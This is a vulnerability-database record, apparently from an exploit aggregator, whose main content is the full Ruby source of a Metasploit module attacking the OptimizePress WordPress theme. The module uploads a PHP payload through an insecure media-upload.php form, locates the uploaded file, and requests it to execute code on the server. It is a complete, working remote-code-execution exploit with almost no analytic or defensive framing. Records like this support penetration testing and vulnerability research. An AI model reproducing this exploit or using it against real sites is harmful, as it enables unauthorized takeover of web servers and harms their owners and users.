DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-21614", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress OptimizePress Theme File Upload", "description": "This Metasploit module exploits a vulnerability found in the the Wordpress theme OptimizePress. The vulnerability is due to an insecure file upload on the media-upload.php component, allowing an attacker to upload arbitrary PHP code. This Metasploit module has been tested successfully on OptimizePress 1.45.", "published": "2013-12-03T00:00:00", "modified": "2013-12-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/21614", "reporter": "metasploit", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-09T03:42:53", "viewCount": 14, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/21614", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'uri'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n include Msf::HTTP::Wordpress\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'WordPress OptimizePress Theme File Upload Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in the the Wordpress theme OptimizePress. The\r\n vulnerability is due to an insecure file upload on the media-upload.php component, allowing\r\n an attacker to upload arbitrary PHP code. This module has been tested successfully on\r\n OptimizePress 1.45.\r\n },\r\n 'Author' =>\r\n [\r\n 'United of Muslim Cyber Army', # Vulnerability discovery\r\n 'Mekanismen' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', \"http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/\" ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [ ['OptimizePress', {}] ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 29 2013'\r\n ))\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('THEMEDIR', [ true, 'OptimizePress Theme directory', 'OptimizePress'])\r\n ])\r\n end\r\n\r\n def check\r\n uri = target_uri.path\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')\r\n })\r\n\r\n if res and res.code == 200 and res.body.to_s =~ /Upload New Image/\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n uri = normalize_uri(target_uri.path)\r\n\r\n #get upload filepath\r\n print_status(\"#{peer} - Getting the upload path...\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')\r\n })\r\n\r\n unless res and res.code == 200\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to access vulnerable URL\")\r\n end\r\n\r\n if res.body =~ /<input name=\"imgpath\" type=\"hidden\" id=\"imgpath\" value=\"(.*)\" \\/>/\r\n file_path = $1\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to get upload filepath\")\r\n end\r\n\r\n #set cookie\r\n cookie = res.get_cookies\r\n\r\n filename = rand_text_alphanumeric(8) + \".php\"\r\n\r\n #upload payload\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(\"<?php #{payload.encoded} ?>\", \"application/octet-stream\", nil, \"form-data; name=\\\"newcsimg\\\"; filename=\\\"#{filename}\\\"\")\r\n post_data.add_part(\"Upload File\", nil, nil, \"form-data; name=\\\"button\\\"\")\r\n post_data.add_part(\"1\", nil, nil, \"form-data; name=\\\"newcsimg\\\"\")\r\n post_data.add_part(\"#{file_path}\", nil, nil, \"form-data; name=\\\"imgpath\\\"\")\r\n\r\n print_status(\"#{peer} - Uploading PHP payload...\")\r\n\r\n n_data = post_data.to_s\r\n n_data = n_data.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'),\r\n 'ctype' => 'multipart/form-data; boundary=' + post_data.bound,\r\n 'data' => n_data,\r\n 'headers' => {\r\n 'Referer' => \"#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php\"\r\n },\r\n 'cookie' => cookie\r\n })\r\n\r\n unless res and res.code == 200\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to upload payload\")\r\n end\r\n\r\n print_good(\"#{peer} - Payload uploaded successfully. Disclosing the payload path...\")\r\n #get path to payload\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')\r\n })\r\n\r\n unless res and res.code == 200\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to access vulnerable URL\")\r\n end\r\n\r\n payload_url = \"\"\r\n\r\n if res.body =~ /name=\"cs_img\" value=\"(.*#{filename}.*)\" \\/> <span/\r\n payload_url =$1\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to deliver the payload\")\r\n end\r\n\r\n begin\r\n u = URI(payload_url)\r\n rescue ::URI::InvalidURIError\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to deliver the payload, #{payload_url} isn't an URL'\")\r\n end\r\n\r\n register_files_for_cleanup(File::basename(u.path))\r\n\r\n print_good(\"#{peer} - Our payload is at: #{u.path}! Executing payload...\")\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => u.path\r\n })\r\n end\r\nend\n\n# 0day.today [2018-04-09] #", "_state": {"dependencies": 1645320772, "score": 1659766679, "epss": 1678811959}}

{}